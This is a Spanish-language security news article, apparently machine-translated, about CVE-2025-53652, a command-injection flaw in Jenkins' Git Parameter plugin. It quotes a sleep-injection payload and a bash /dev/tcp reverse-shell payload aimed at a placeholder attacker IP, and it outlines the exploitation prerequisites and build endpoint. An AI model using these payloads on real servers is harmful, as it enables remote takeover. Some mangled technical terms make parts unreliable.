Una vulnerabilidad de seguridad crítica que afecta a miles de servidores de Jenkins en todo el mundo ha surgido como una amenaza significativa para la infraestructura empresarial.
CVE-2025-53652, inicialmente clasificado como gravedad media, afecta el complemento de parámetros GIT ampliamente utilizado y permite a los atacantes ejecutar comandos arbitrarios en sistemas vulnerables.
La vulnerabilidad proviene de la validación de entrada insuficiente en las definiciones de parámetros, lo que permite a los actores maliciosos inyectar comandos que luego se ejecutan directamente en entornos de shell.
El alcance de esta vulnerabilidad es particularmente preocupante dada la adopción generalizada de Jenkins en entornos DevOps.
Según los datos de escaneo de Internet, aproximadamente 15,000 servidores Jenkins parecen permitir el acceso no autenticado, lo que hace que la ejecución de código remoto sea viable sin requerir credenciales válidas.
Esta configuración amplifica significativamente el impacto potencial, ya que los atacantes pueden explotar estos sistemas sin barreras de autenticación tradicionales.
Investigadores de Vulncheck identificado La verdadera gravedad de la vulnerabilidad se extiende mucho más allá de su calificación media inicial.
La falla de seguridad permite a los atacantes inyectar valores arbitrarios en los parámetros GIT, que posteriormente se procesan mediante comandos GIT sin la desinfección adecuada.
Esto crea una vía directa para los ataques de inyección de comandos, transformando lo que parecía ser un problema de inyección de parámetros en una vulnerabilidad de ejecución de código remoto crítico.
El mecanismo de ataque se basa en la versatilidad de Git como una gtfobina, lo que permite técnicas de explotación creativa.
Cuando un atacante proporciona entrada maliciosa como $ (Sleep 80) como parámetro de rama, el comando inyectado aparece en la cadena de ejecución de GIT.
La ruta de código vulnerable procesa esta entrada durante las operaciones de GIT, específicamente en comandos como Git Rev-Parse–Resolve-Git-Dir, donde la carga útil maliciosa es ejecutada por el shell subyacente.
Mecánica de explotación técnica
El proceso de explotación demuestra el impacto práctico de la vulnerabilidad a través de técnicas de inyección de comandos.
Cuando un trabajo de Jenkins procesa un parámetro GIT, el sistema construye los comandos de shell que incorporan valores proporcionados por el usuario sin una validación adecuada.
Advertencia de complemento (fuente – Vulncheck)
Por ejemplo, un valor de parámetro malicioso como $ (bash -c “bash> &/dev/tcp/atacante_ip/puerto <& 1") puede establecer conexiones de caparazón inversa, otorgando a los atacantes el acceso completo al sistema.
El ataque requiere tres componentes clave: el nombre de compilación de destino, una cookie de sesión válida y un token CSRF Jenkins-Crumb.
Los atacantes pueden obtener estos requisitos previos a través de simples solicitudes de reconocimiento a la instancia de Jenkins. Una vez adquirido, la explotación se realiza a través de solicitudes de publicación HTTP a/Job/(BuildName)/Build Punto final, incrustando la carga útil maliciosa dentro de la estructura de parámetros.
El monitoreo del proceso revela que las operaciones GIT generan procesos infantiles que ejecutan los comandos proporcionados por el atacante, confirmando la ejecución exitosa del código con los privilegios de usuarios de Jenkins.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
